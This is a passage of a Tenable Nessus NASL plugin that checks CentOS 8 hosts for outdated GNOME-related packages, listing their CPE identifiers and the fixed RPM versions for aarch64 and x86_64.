value:\"p-cpe:/a:centos:centos:accountsservice-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:accountsservice-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:appstream-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:baobab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:chrome-gnome-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evince\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evince-browser-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evince-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evince-nautilus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:file-roller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gdk-pixbuf2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gdk-pixbuf2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gdk-pixbuf2-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gdk-pixbuf2-xlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gdk-pixbuf2-xlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gdm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gjs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gjs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-classic-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-control-center\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-control-center-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-desktop3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-desktop3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-remote-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-settings-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-apps-menu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-auto-move-windows\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-dash-to-dock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-disable-screenshield\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-drive-menu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-horizontal-workspaces\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-launch-new-instance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-native-window-placement\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-no-hot-corner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-panel-favorites\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-places-menu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-screenshot-window-sizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-systemMonitor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-top-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-updates-dialog\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-user-theme\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-window-grouper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-window-list\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-windowsNavigator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-shell-extension-workspace-indicator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-software\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-software-editor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-tweaks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gsettings-desktop-schemas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gsettings-desktop-schemas-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gtk-update-icon-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gtk3-immodule-xim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-afc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-afp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-archive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-fuse\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-goa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-gphoto2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-mtp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gvfs-smb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mozjs60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mozjs60-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mutter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mutter-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nautilus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nautilus-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nautilus-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pango\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pango-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-core-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-graphics-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-plugin-fade-throbber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-plugin-label\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-plugin-script\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-plugin-space-flares\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-plugin-throbgress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-plugin-two-step\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-system-theme\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-theme-charge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-theme-fade-in\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-theme-script\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-theme-solar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-theme-spinfinity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:plymouth-theme-spinner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wayland-protocols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3-plugin-process-gtk2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'accountsservice-0.6.50-7.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'accountsservice-0.6.50-7.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'accountsservice-devel-0.6.50-7.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'accountsservice-devel-0.6.50-7.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'accountsservice-libs-0.6.50-7.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'accountsservice-libs-0.6.50-7.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'appstream-data-8-20190805.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'appstream-data-8-20190805.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'baobab-3.28.0-2.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'baobab-3.28.0-2.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chrome-gnome-shell-10.1-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chrome-gnome-shell-10.1-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-3.28.4-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-3.28.4-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-browser-plugin-3.28.4-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-browser-plugin-3.28.4-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-libs-3.28.4-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-libs-3.28.4-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-nautilus-3.28.4-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'evince-nautilus-3.28.4-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'file-roller-3.28.1-2.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'file-roller-3.28.1-2.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-devel-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-devel-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdm-3.28.3-22.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'gdm-3.28.3-22.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'gjs-1.56.2-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gjs-1.56.2-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gjs-devel-1.56.2-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gjs-devel-1.56.2-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-classic-session-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-classic-session-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-control-center-3.28.2-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-control-center-3.28.2-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-control-center-filesystem-3.28.2-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-control-center-filesystem-3.28.2-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-3.32.2-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-devel-3.32.2-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-devel-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-remote-desktop-0.1.6-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-remote-desktop-0.1.6-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-settings-daemon-3.32.0-4.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-settings-daemon-3.32.0-4.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-3.32.2-9.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-3.32.2-9.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-apps-menu-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-apps-menu-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-auto-move-windows-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-auto-move-windows-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-common-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-common-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-dash-to-dock-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-dash-to-dock-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-desktop-icons-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-desktop-icons-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-disable-screenshield-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-disable-screenshield-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-drive-menu-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-drive-menu-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-horizontal-workspaces-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-horizontal-workspaces-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-launch-new-instance-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-launch-new-instance-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-native-window-placement-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-native-window-placement-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-no-hot-corner-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-no-hot-corner-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-panel-favorites-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-panel-favorites-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-places-menu-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-places-menu-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-screenshot-window-sizer-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-screenshot-window-sizer-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-systemMonitor-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-systemMonitor-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-top-icons-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-top-icons-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-updates-dialog-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-updates-dialog-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-user-theme-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-user-theme-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-window-grouper-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-window-grouper-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-window-list-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-window-list-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-windowsNavigator-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-windowsNavigator-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-workspace-indicator-3.32.1-10.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-shell-extension-workspace-indicator-3.32.1-10.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-software-3.30.6-2.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-software-3.30.6-2.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-software-editor-3.30.6-2.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-software-editor-3.30.6-2.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-tweaks-3.28.1-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-tweaks-3.28.1-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gsettings-desktop-schemas-3.32.0-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gsettings-desktop-schemas-3.32.0-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gsettings-desktop-schemas-devel-3.32.0-3.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gsettings-desktop-schemas-devel-3.32.0-3.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk-update-icon-cache-3.22.30-4.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk-update-icon-cache-3.22.30-4.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk3-3.22.30-4.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk3-3.22.30-4.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk3-devel-3.22.30-4.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk3-devel-3.22.30-4.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk3-immodule-xim-3.22.30-4.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gtk3-immodule-xim-3.22.30-4.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-afc-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-afc-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-afp-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-afp-1.36.2-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gvfs-archive-1.36.2-6.el8', 'cpu':'aarch64', 'release':'8', 